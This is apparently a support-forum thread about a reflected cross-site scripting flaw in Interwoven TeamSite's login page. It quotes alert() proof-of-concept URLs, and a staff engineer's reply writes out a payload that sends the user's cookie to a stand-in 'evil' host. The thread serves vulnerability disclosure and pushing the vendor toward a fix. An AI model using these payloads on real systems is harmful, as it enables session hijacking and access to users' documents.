Cross-Site Scripting (XSS) Vulnerability

Hi,
TS 552 SP3 Solaris
My Security colleagues in Japan found a Cross-Site Scripting (XSS) Vulnerability in TeamSite whilst doing the annual penetration tests last year.
Examples of the vulnerability are below:-
http://iwserver/iw/webdesk/login?done_page=/iw/webdesk/loggedin"><script>alert(document.cookie) </script>
or
http://iwserver/iw/webdesk/login?done_page=/iw/webdesk/loggedin"><script>alert("Hello World!") </script>

Whilst interwoven agree that a vulnerability may exist they will not issue a bug because they 'cannot think of anything that would compromise TeamSite or the client since the information that's available will always be client side based'.

I agree with their stance in part (I cannot think of a scenario how the vulnerability may be exploited), however, I find it rather surprising that a vendor accepts the existence of a security bug but will not fix it. Surely the whole issue of the severity of a vulnerability is open to interpretation and exploitation and thus risk.

I suppose I’m posting this because I’m in a position where I find Interwoven’s position difficult to defend and would like to know if any other person/company has any experience in XSS vulnerabilities in TeamSite (or any other application) and if they have a more relaxed security policy regarding such a vulnerability?
Is the client being too ruthless in assuming if any security vulnerability is found it needs to be fixed?

Any help/experience on the issue would be much appreciated.

Steve.

Steve North
Interwoven Consultant
Sony - Europe

Find more posts tagged with

Comments

abackenr

i think that these security concerns should definately be addressed, and i'm surprised that interwoven has not addressed these concerns. please open up a support case.

clearly, the exploit you have described can be used to compromise content (which is ultimately what TeamSite is supposed to protect).

your exploit can be expanded to /iw/webdesk/login?done_page=javascript&colon;{ document.location.href="http://evil/steal_cookie?" + document.cookie }, which would give evil access to the user's cookie, allowing evil to impersonate the user and gain access to any documents that only the user should have access to. this is clearly bad.

there are a couple of mitigating factors, such as that the IWAUTH cookie (which is what identifies an authenticated user to TeamSite) eventually expires and the user has to log in again. and also that the origin of such a link is suspect (the user would actually have to click on this link, log in, and expose the cookie), and one would hope that a user is sufficiently paranoid not to click on any link from an unknown source.

so while this isn't clearly an open gaping security hole that anyone can exploit, it's definately something that should be addressed. please contact support.

ariel

staff engineer @ interwoven

fish

The support has been open some time and I've taken the liberty of adding your specific expansion of the exploit to the case this will hopefully get things moving along ...

Many thanks for your reply, it was very useful.

Steve